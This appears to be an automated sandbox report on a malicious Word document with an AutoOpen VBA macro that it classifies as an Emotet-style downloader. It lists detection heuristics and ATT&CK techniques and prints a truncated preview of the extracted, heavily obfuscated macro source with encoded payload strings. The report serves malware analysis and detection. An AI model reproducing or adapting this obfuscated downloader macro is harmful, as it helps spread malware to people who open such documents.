MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro. Heuristics indicate the presence of an AutoOpen macro that uses CreateObject, suggesting it's designed to execute code. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further confirms its malicious nature. The VBA script itself is heavily obfuscated but the presence of the 'macros.bas' artifact and the AutoOpen execution pattern strongly suggest it acts as a downloader for a second-stage payload, likely delivered via spearphishing.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 34288 bytes |
SHA-256: b735878d03974b52593abef4b807729850b2c05d1d2b04cc54486e3db8e44751 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 14 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ahvJAlTOji"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "rtwwCGuqZCjWri"
Function RXdXtbklZS()
On Error Resume Next
pnVpi = 96047 * 71685
HoKva = (50774 + CDate(97837 / Atn(uZAuI)) / 71614 * OTSpih * 2817 * CInt(UcTKCm) * wpMrJz / CSng(EtOQK))
ZbqwEK = Tan(13423)
TCjbvtrEfF = irAZQ("aYnUAFYM+Qx5fq3/z7Cbb", 8, 12)
MIGZF = 90072 * 82230
HPwjQ = (54650 + CDate(20218 / Atn(QcjwPZ)) / 51257 * WFUsm * 43532 * CInt(rfIkh) * RDCbl / CSng(zTbjzR))
fciKG = Tan(74768)
hXARmA = 19752 * 50574
fYwtS = (13515 + CDate(50478 / Atn(EDGLW)) / 78539 * LKQwh * 96372 * CInt(FMVOkc) * lBjEiE / CSng(vkvcvi))
UfZKih = Tan(13198)
HsCstzGM = irAZQ("U,WH/et7Ne2HWXXlOeN1XjJv726vyuGdd+fvQstcn1L+sa933J3WN6b5W+1xDvBDPR+m6rfa5TrwxJD0", 5, 74)
jNsOhS = 71695 * 44615
WzmTC = (44838 + CDate(13026 / Atn(kjPaVT)) / 72095 * KkhwE * 4527 * CInt(iJSWLQ) * PKNrG / CSng(sUSISS))
wrBNtH = Tan(90472)
atqfkS = 13361 * 90406
SzTVw = (70632 + CDate(2780 / Atn(ScqfX)) / 75148 * JCihk * 38478 * CInt(pOwFad) * iMpSt / CSng(UhKcFF))
UVjGDG = Tan(48501)
wzwUR = irAZQ("rCdPGPqQzt+vrxc366S4dau/m7YeHse1tv3+4Thbqi+8uzt+/G/5U/D0YDN69H5b/XA2LcjgoPw/eXYkNW0", 3, 77)
hjZKB = 52502 * 19640
WqKYQ = (75202 + CDate(30294 / Atn(Niwwb)) / 86523 * bfWWU * 60427 * CInt(CUEizc) * HrNJc / CSng(lvhjhF))
sZHcvo = Tan(56537)
wvDLqp = 73966 * 74272
qwvYss = (53602 + CDate(55595 / Atn(dUsLfZ)) / 19227 * vWBlm * 85417 * CInt(sTfYTT) * FPGzWi / CSng(jaTUi))
QDlQiB = Tan(55153)
ojRwnWcdXAQ = irAZQ("bdJqCj9Jl", 6, 2)
QkpDGw = 60949 * 48674
DJUqP = (55353 + CDate(9271 / Atn(CbNMvi)) / 31650 * wfphP * 88719 * CInt(qspiR) * QjUKNP / CSng(OFAaj))
baPiUC = Tan(47696)
kDnHn = 58015 * 18115
iitYk = (75343 + CDate(54366 / Atn(bAPTj)) / 37515 * GzwIG * 16337 * CInt(VWiFik) * jcMqvJ / CSng(cWKtz))
IQzRU = Tan(32076)
rEBuvRTNjfz = irAZQ("dV1ROMPT+Gk72Sc018ZPwk38L+nnX1OgIPnfiE9UO+a+G21lwG7xXkE/FQp3iMc20mPm6i5jfqCJwUml/oF8674OeJT9S1ctxsNH8K4aPkveQD4Mx5OhIfy/jNXEn35zw34OeakV", 7, 128)
jJpWDw = 65356 * 25463
qiEsR = (85482 + CDate(47303 / Atn(cnKAi)) / 52225 * OGzoFY * 31612 * CInt(RCGZmq) * zbIFjj / CSng(HrPrvo))
GjCiBH = Tan(93601)
cMohbC = 81300 * 2227
KMGmHv = (52835 + CDate(98060 / Atn(TEGAEV)) / 93504 * zZKQQ * 86286 * CInt(bWimli) * KbFcpl / CSng(hZvhzI))
nbHTl = Tan(29284)
iYWiLamS = irAZQ("n71XTSRY32l530q/TxNPN8w7qwTsfTPpfnbt6btK9wf5QeYp7AB5PAvnTekJ6aiX9mef9Ff+163Uu7gfWhzkd9yU81+YnzpVS/bPq9nvN5e9qn40kfR+2xkXE0kXnmnt/0ezB1OfYc4DTPyVnew9CPWS9iDr/0v3tgz+cnf5/wfpEeNPYDdTdjm1rb", 5, 177)
RqcuT = 37008 * 21379
RpNwtu = (57750 + CDate(90866 / Atn(fKhRzO)) / 66521 * kjnuW * 36425 * CInt(PWtlci) * STvIG / CSng(CPIJj))
nailRc = Tan(88526)
MACCr = 23936 * 41651
pDqYa = (2448 + CDate(56557 / Atn(tSWHj)) / 64863 * zFYDwz * 93475 * CInt(Vmpia) * ownPY / CSng(jzziPn))
dpWUi = Tan(58267)
wPiAQjcKqPR = irAZQ("qv8vvD3O9gxv7d1u1u338Afvyc9T/43eJ7Od8l+eh6yn27H72vdTu32R56vdO7o9lL86Xnw+O89zvTei8eR4obfc0ufk+hx3NMP5iN0Hn/w9wf+fY58RX9/558N7MQUn/Lp8bdDV3v", 2, 132)
DwTIX = 6254 * 85532
UlkSCF = (9627 + CDate(41591 / Atn(rLnzBG)) / 79698 * KbShzR * 13744 * CInt(Ewsdi) * VBAcNw / CSng(lPYUmd))
qZBpd = Tan(40459)
hliJC = 15003 * 5521
FMisd = (92740 + CDate(36382 / Atn(ObiSwC)) / 65679 * LkwiJw * 31927 * CInt(AMwwd) * rtQpE / CSng(RaSMaT))
vYUEfD = Tan(86621)
MCdMAzpFHw = irAZQ("%w3qwD4Bb+04J8i7heb8a6ZA", 3, 17)
RLULGv = 13608 * 84708
zUUrj = (79259 + CDate(4206 / Atn(zAUkR)) / 68021 * pOVwj * 14783 * CInt(ukYZh) * izlKiB / CSng(GzsLj))
vhCYM = Tan(99936)
YjUavG = 74253 * 4347
FEzBqz = (46651 + CDate(58933 / Atn(uHZusw)) / 84803 * Tapvl * 69887 * CInt(fLYqD) * JHvCnd / CSng(GtEwr))
IAGdr = Tan(41845)
NkhRn = irAZQ("Dvd4exT.encOdiNg]::AScii )}).ReadtOEnD()a5", 5, 36)
dnMMAT = 38062 * 83649
iZhaE = (71079 + CDate(1449 / Atn(sEVSMZ)) / 41857 * EWbFYh * 63611 * CInt(UwVui) * TJijO / CSng(QQJXzc))
mAQQNq = Tan(39930)
iJvMP = 2289 *
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.